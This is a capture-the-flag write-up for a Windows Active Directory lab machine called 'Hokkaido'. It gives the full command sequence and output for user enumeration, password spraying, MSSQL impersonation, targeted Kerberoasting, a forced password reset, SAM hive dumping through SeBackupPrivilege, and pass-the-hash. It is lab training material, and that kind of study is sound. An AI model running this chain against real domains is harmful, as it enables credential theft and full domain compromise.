Hokkaido (Intemediate, Windows AD) ★

[WDavid404]

Keypoints:

• kerbrute --> find user list such as discovery, info, etc
• SMB share folder/file --> find 'discovery's password
• impacket-mssqlclient (for MSSQL) with discovery cred --> found 'hrapp-service' user
• Use bloodhound with hrapp-service cred --》found that 'hrapp-service' user has genericWrite Permission To Hazel.Green user which is tier2admin, so do targetedKerberoast.py with hrapp-service cred --> got hazel.green user info
• since hazel.green is a member of IT Group, so use rpcclient --》 modify one tier1 admin user password
• xfreerdp login with tier1 admin user cred
• [PE] This tier1 admin user has SeBackupPrivilege， abuse it

[WDavid404]

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus

80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0

88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-12 06:57:26Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services

5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

8530/tcp  open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0

8531/tcp  open  unknown       syn-ack ttl 125
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing

47001/tcp open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49769/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open  ms-sql-s      syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM

139/tcp (SMB)

smbmap -u null -p "" -H 192.168.218.40 -P 445 -r 2>&1 --> no info

kerbrute -domain hokkaido-aerospace.com -dc-ip 192.168.184.40 -users /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 100 --> users:

info
administrator
discovery
maintenance

create a small wordlist for password:

Winter2023
Summer2023
Spring2023
Fall2023
info
administrator
discovery
maintenance
ofni
rotartsinimda
yrevocsid
ecnanetniam

lets brute-force using crackmapexec… crackmapexec smb 192.168.184.40 --shares -u users.txt -p pass.txt --continue-on-success --> info:info

crackmapexec smb 192.168.184.40 --shares -u info -p info

On Homes share found directories create with name user’s name. Inside those directories didn't found anything. on NETLOGON Share there is a temp folder which has a file password_reset.txt That text file contain these text. Initial Password: Start123!

crackmapexec smb 192.168.184.40 -u users.txt -p Start123! --continue-on-success --> discovery:Start123!

evil-winrm login ---> all failed

impacket-GetUserSPNs -dc-ip 192.168.184.40 hokkaido-aerospace.com/discovery:Start123! -request

Tried to crack maintenance user’s hash but failed.

Try to move to mssql server and succeed with discovery's credential. impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.208.40 -dc-ip 192.168.184.40 -windows-auth

check what are available database are there. MSSQL command refer to https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md

SQL (HAERO\discovery  guest@master)> SELECT name FROM master..sysdatabases;
SQL (HAERO\discovery  guest@master)> use hrappdb
--> ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
-->  we don’t have permission to use hrappdb. lets check any user we can impersonate on mssql.

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
--> 
hrappdb-reader

--> Lets login as user "hrappdb-reader" and use "hrappdb" database.

SQL (HAERO\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader  guest@master)> use hrappdb

-->let view the data:
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> select * from sysauth;
--> hrapp-service:Untimed$Runny

winrm login with this creds but no luck

Use bloodhound bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.208.40 --> hrapp-service has genericWrite Permission To Hazel.Green user which is tier2admin

targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40 --> Got hash of the hazel.green user by Cracking the hash we got password: haze1988 (targetedKerberoast.py: This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting.)

In bloodhound we can se hazel.green is a member of IT Group so we can forcefully change pass of tier 1 admin which is MOLLY.SMITH… lets use rpcclient to set the password.

rpcclient -N  192.168.208.40 -U 'hazel.green%haze1988'
$> setuserinfo2 MOLLY.SMITH 23 'Password123!'

Login with MOLLY.SMITH credential xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.208.40 +clipboard

whoami /priv --> SeBackupPrivilege

reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

[Kali] impacket-secretsdump -system system -sam sam local  

-->

[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

now evil-winrm to the machine using administrator account: evil-winrm -i 192.168.184.40 -u administrator -H "d752482897d54e239376fddb2a2109e4"